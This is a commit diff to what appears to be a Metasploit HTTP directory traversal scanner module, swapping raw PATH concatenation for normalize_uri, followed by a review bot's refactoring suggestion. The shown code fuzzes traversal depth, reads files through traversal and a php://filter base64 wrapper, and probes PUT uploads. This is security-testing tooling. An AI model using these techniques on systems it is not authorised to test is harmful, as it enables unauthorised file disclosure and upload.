
Commit 9f78bec

author
Tod Beardsley
committed
Use normalize_uri (@wchen-r7)
Instead of editing the datastore['PATH'], use normalize_uri. Since the purpose of this module is quite fuzz-like, I didn't want to apply the normalize_uri to the whole uri -- the original code merely applied to datastore['PATH'] (which seems like it should be datastore['URI'] really) and then added on a bunch of other stuff to test for traversals.
1 parent f7bfab5 commit 9f78bec


1 file changed

+7
-12
lines changed


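--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -106,7 +106,7 @@ def fuzz
 1.upto(depth) do |d|
 file_to_read.each do |f|
 trigger = base * d
-p = datastore['PATH'] + trigger + f
+p = normalize_uri(datastore['PATH']) + trigger + f
 req = ini_request(p)
 vprint_status("Trying: http://#{rhost}:#{rport}#{p}")
 res = send_request_cgi(req, 25)
@@ -187,15 +187,15 @@ def check(trigger)
 if datastore['TRIGGER'].empty?
 # Found trigger using fuzz()
 found = true if trigger
-uri = datastore['PATH'] + trigger
+uri = normalize_uri(datastore['PATH']) + trigger
 else
 # Manual check. meh.
 if datastore['FILE'].empty?
 print_error("Must specify a 'FILE' to check manually")
 return
 end
 
-uri = datastore['PATH'] + trigger + datastore['FILE']
+uri = normalize_uri(datastore['PATH']) + trigger + datastore['FILE']
 req = ini_request(uri)
 vprint_status("Trying: http://#{rhost}:#{rport}#{uri}")
 res = send_request_cgi(req, 25)
@@ -211,7 +211,7 @@ def check(trigger)
 :port => rport,
 :vhost => datastore['VHOST'],
 :path => uri,
-:params => datastore['PATH'],
+:params => normalize_uri(datastore['PATH']),
 :pname => trigger,
 :risk => 3,
 :proof => trigger,
@@ -234,7 +234,7 @@ def lfi_download(trigger, files)
 # Our trigger already puts us in '/', so our filename doesn't need to begin with that
 f = f[1,f.length] if f =~ /^\//
 
-req = ini_request(uri = (datastore['PATH'] + trigger + f).chop)
+req = ini_request(uri = (normalize_uri(datastore['PATH']) + trigger + f).chop)
 res = send_request_cgi(req, 25)
 
 vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
@@ -261,7 +261,7 @@ def php_download(files)
 # Our trigger already puts us in '/', so our filename doesn't need to begin with that
 f = f[1,f.length] if f =~ /^\//
 
-req = ini_request(uri = (datastore['PATH'] + "php://filter/read=convert.base64-encode/resource=" + f).chop)
+req = ini_request(uri = (normalize_uri(datastore['PATH']) + "php://filter/read=convert.base64-encode/resource=" + f).chop)
 res = send_request_cgi(req, 25)
 
 vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
@@ -294,7 +294,7 @@ def is_writable(trigger)
 
 # Form the PUT request
 fname = Rex::Text.rand_text_alpha(rand(5) + 5) + '.txt'
-uri = datastore['PATH'] + trigger + fname
+uri = normalize_uri(datastore['PATH']) + trigger + fname
 vprint_status("Attempt to upload to: http://#{rhost}:#{rport}#{uri}")
 req = ini_request(uri)
 
@@ -331,11 +331,6 @@ def load_filelist
 end
 
 def run_host(ip)
-# Make sure datastore['PATH] begins with a '/'
-if datastore['PATH'] !~ /^\//
-datastore['PATH'] = '/' + datastore['PATH']
-end
-
 print_status("Running action: #{action.name}...")
 
 # And it's..... "SHOW TIME!!"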
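Review bot: The expression `normalize_uri(datastore['PATH'])` is now repeated at seven call sites (fuzz, twice in check plus the report hash, lfi_download, php_download, is_writable), and with the explanatory comment in run_host deleted nothing left in the file says why only PATH is normalized while the trigger and file name are appended raw. A small private helper would keep the sites consistent and carry that rationale: `# Only the configured PATH is normalized; trigger/filename are appended as-is so doubled slashes in traversal sequences are preserved.` followed by `def base_path; normalize_uri(datastore['PATH']); end`, used in place of each inline call. As far as I recall normalize_uri only guarantees a leading slash and does not add a trailing one, so a PATH such as `/app` is still glued directly to the trigger exactly as the removed run_host check allowed; that is unchanged behaviour but worth a sentence in the helper's comment. All of the methods touched here start outside the shown hunks.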
